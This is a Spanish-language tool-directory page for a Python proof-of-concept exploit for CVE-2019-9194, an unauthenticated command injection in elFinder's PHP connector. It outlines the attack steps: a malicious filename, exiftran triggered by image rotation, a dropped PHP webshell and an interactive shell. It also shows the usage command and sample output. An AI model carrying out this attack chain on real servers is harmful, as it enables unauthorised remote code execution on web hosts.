Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2019-9194-elFinder-Command-Injection-PoC — Vulnerabilidad de inyección de comandos en elFinder <= 2.1.47 a través del componente PHP connector. Permite ejecución remota de código no autenticada como el usuario del servidor web. | Kitploit
Herramientas/GitHubGitHub/estebanzarate/cve-2019-9194-elfinder-command-injection-poc
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y Control
GitHubestebanzarate/cve-2019-9194-elfinder-command-injection-poc

CVE-2019-9194-elFinder-Command-Injection-PoC

Vulnerabilidad de inyección de comandos en elFinder <= 2.1.47 a través del componente PHP connector. Permite ejecución remota de código no autenticada como el usuario del servidor web.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
2hace 6 mesesAún no revisado

CVE-2019-9194 — Inyección de Comandos en elFinder (PoC)

Vulnerabilidad de inyección de comandos en elFinder <= 2.1.47 a través del componente conector PHP. Permite ejecución remota de código sin autenticación como el usuario del servidor web.

Cómo funciona

  • Sube un JPEG válido con un nombre de archivo malicioso que contiene un comando de shell.
  • Desencadena la vulnerabilidad solicitando una rotación de imagen, que pasa el nombre de archivo a exiftran sin sanitización.
  • El comando inyectado escribe una webshell PHP (SecSignal.php) en el servidor.
  • Se conecta a la webshell y accede a un shell interactivo.

Requisitos

  • Python 3
  • librería requests (pip install requests)
  • El objetivo debe tener exiftran instalado y el conector PHP de elFinder habilitado (connector.minimal.php)

Uso

root@kitploit:~
python3 exploit.py http://TARGET

Ejemplo:

root@kitploit:~
$ python3 exploit.py http://10.10.10.10/elFinder
[*] Uploading malicious image...
[*] File uploaded, hash: l1_U2VjU2lnbmFsLmpwZw
[*] Triggering command injection via image rotation...
[*] Checking for webshell...
[+] Pwned!
[+] Interactive shell (Ctrl+C to exit)

$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Referencias

  • CVE-2019-9194
  • EDB-46481
  • Informe de vulnerabilidad — SecSignal
  • Versión 2.1.48 de elFinder (corrección)

Créditos

  • Descubrimiento: Thomas Chauchefoin
  • Exploit original: @q3rv0
  • Puerto a Python 3 y mejoras estilo Metasploit: Esteban Zárate
Descargar herramienta